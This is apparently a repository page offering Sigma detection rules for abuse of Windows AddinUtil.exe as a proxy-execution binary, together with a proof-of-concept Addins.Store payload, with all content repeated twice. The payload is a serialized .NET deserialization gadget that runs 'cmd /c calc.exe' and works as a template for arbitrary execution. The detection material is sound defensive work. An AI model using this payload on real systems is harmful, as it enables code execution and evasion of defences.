SILJAEUROPA/!AddinUtil.exe LOLBAS Sigma

## !AddinUtil.exe LOLBAS Sigma
Collection of AddinUtil.exe LOLBAS Sigma Signatures and an AddinUtil.exe PoC Payload.

## Addins.Store
           ª»   ÿÿÿÿ          ^Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35   BMicrosoft.VisualStudio.Text.Formatting.TextFormattingRunProperties   ForegroundBrush      ·<?xml version="1.0" encoding="utf-16"?>
<ObjectDataProvider MethodName="Start" IsInitialLoadEnabled="False" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml">
  <ObjectDataProvider.ObjectInstance>
    <sd:Process>
      <sd:Process.StartInfo>
        <sd:ProcessStartInfo Arguments="/c calc.exe" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
      </sd:Process.StartInfo>
    </sd:Process>
  </ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>

## AddinUtil.exe Execution from Suspicious Directory
title: AddinUtil.exe Execution from Suspicious Directory
id: 74e16e48-667d-4540-893d-e0f100cafc27
status: experimental
description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
references:
    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
tags:
    - attack.defense_evasion
    - attack.t1218
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023/09/18
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\addinutil.exe'
    filter_64bit:
        Image|startswith: 'C:\Windows\Microsoft.NET\Framework64\'
    filter_32bit:
        Image|startswith: 'C:\Windows\Microsoft.NET\Framework\'
    condition: selection and not 1 of filter*
falsepositives:
    - Unknown
level: medium

## AddinUtil.exe Execution with Suspicious Command Line
title: AddinUtil.exe Execution with Suspicious Command Line
id: 74e16e48-667d-4540-893d-e0f100cafc27
status: experimental
description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
references:
    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
tags:
    - attack.defense_evasion
    - attack.t1218
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023/09/18
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\addinutil.exe'
    filter_addinroot:
        CommandLine|contains: '-PipelineRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\'
    filter_pipelineroot:
        CommandLine|contains: '-AddInRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\'
    condition: selection and not 1 of filter*
falsepositives:
    - Unknown
level: medium

## AddinUtil.exe Network Connection
title: AddinUtil.exe Network Connection
id: 3f73cf20-daf9-48ec-ac4d-5e996096c9c0
status: experimental
description: Detects network connections made by the Add-In deployment cache updating utility (AddInutil.exe), which could indicate command and control.
references:
    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
tags:
    - attack.defense_evasion
    - attack.t1218
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023/09/18
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        Image|endswith: '\addinutil.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium

## AddinUtil.exe with Suspicious Child Process
title: AddinUtil.exe with Suspicious Child Process
id: 42e3ad54-a382-4e50-a297-4ee84777bddf
status: experimental
description: Detects suspicious child process of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
references:
    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
tags:
    - attack.defense_evasion
    - attack.t1218
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023/09/18
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\addinutil.exe'
    filter_werfault_32bit:
        Image|endswith: '\Windows\System32\werfault.exe'
    filter_werfault_64bit:
        Image|endswith: '\Windows\SysWOW64\werfault.exe'
    filter_conhost:
        Image|endswith: '\Windows\System32\conhost.exe'
    condition: selection and not 1 of filter*
falsepositives:
    - Unknown
level: medium
	ª» ÿÿÿÿ ^Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35 BMicrosoft.VisualStudio.Text.Formatting.TextFormattingRunProperties ForegroundBrush ·<?xml version="1.0" encoding="utf-16"?>
	<ObjectDataProvider MethodName="Start" IsInitialLoadEnabled="False" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml">
	<ObjectDataProvider.ObjectInstance>
	<sd:Process>
	<sd:Process.StartInfo>
	<sd:ProcessStartInfo Arguments="/c calc.exe" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
	</sd:Process.StartInfo>
	</sd:Process>
	</ObjectDataProvider.ObjectInstance>
	</ObjectDataProvider>
	title: AddinUtil.exe Execution from Suspicious Directory
	id: 74e16e48-667d-4540-893d-e0f100cafc27
	status: experimental
	description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
	references:
	- https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
	tags:
	- attack.defense_evasion
	- attack.t1218
	author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
	date: 2023/09/18
	logsource:
	category: process_creation
	product: windows
	detection:
	selection:
	Image\|endswith: '\addinutil.exe'
	filter_64bit:
	Image\|startswith: 'C:\Windows\Microsoft.NET\Framework64\'
	filter_32bit:
	Image\|startswith: 'C:\Windows\Microsoft.NET\Framework\'
	condition: selection and not 1 of filter*
	falsepositives:
	- Unknown
	level: medium
	title: AddinUtil.exe Execution with Suspicious Command Line
	id: 74e16e48-667d-4540-893d-e0f100cafc27
	status: experimental
	description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
	references:
	- https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
	tags:
	- attack.defense_evasion
	- attack.t1218
	author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
	date: 2023/09/18
	logsource:
	category: process_creation
	product: windows
	detection:
	selection:
	Image\|endswith: '\addinutil.exe'
	filter_addinroot:
	CommandLine\|contains: '-PipelineRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\'
	filter_pipelineroot:
	CommandLine\|contains: '-AddInRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\'
	condition: selection and not 1 of filter*
	falsepositives:
	- Unknown
	level: medium
	title: AddinUtil.exe Network Connection
	id: 3f73cf20-daf9-48ec-ac4d-5e996096c9c0
	status: experimental
	description: Detects network connections made by the Add-In deployment cache updating utility (AddInutil.exe), which could indicate command and control.
	references:
	- https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
	tags:
	- attack.defense_evasion
	- attack.t1218
	author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
	date: 2023/09/18
	logsource:
	category: network_connection
	product: windows
	detection:
	selection:
	Initiated: 'true'
	Image\|endswith: '\addinutil.exe'
	condition: selection
	falsepositives:
	- Unknown
	level: medium
	title: AddinUtil.exe with Suspicious Child Process
	id: 42e3ad54-a382-4e50-a297-4ee84777bddf
	status: experimental
	description: Detects suspicious child process of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
	references:
	- https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
	tags:
	- attack.defense_evasion
	- attack.t1218
	author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
	date: 2023/09/18
	logsource:
	category: process_creation
	product: windows
	detection:
	selection:
	ParentImage\|endswith: '\addinutil.exe'
	filter_werfault_32bit:
	Image\|endswith: '\Windows\System32\werfault.exe'
	filter_werfault_64bit:
	Image\|endswith: '\Windows\SysWOW64\werfault.exe'
	filter_conhost:
	Image\|endswith: '\Windows\System32\conhost.exe'
	condition: selection and not 1 of filter*
	falsepositives:
	- Unknown
	level: medium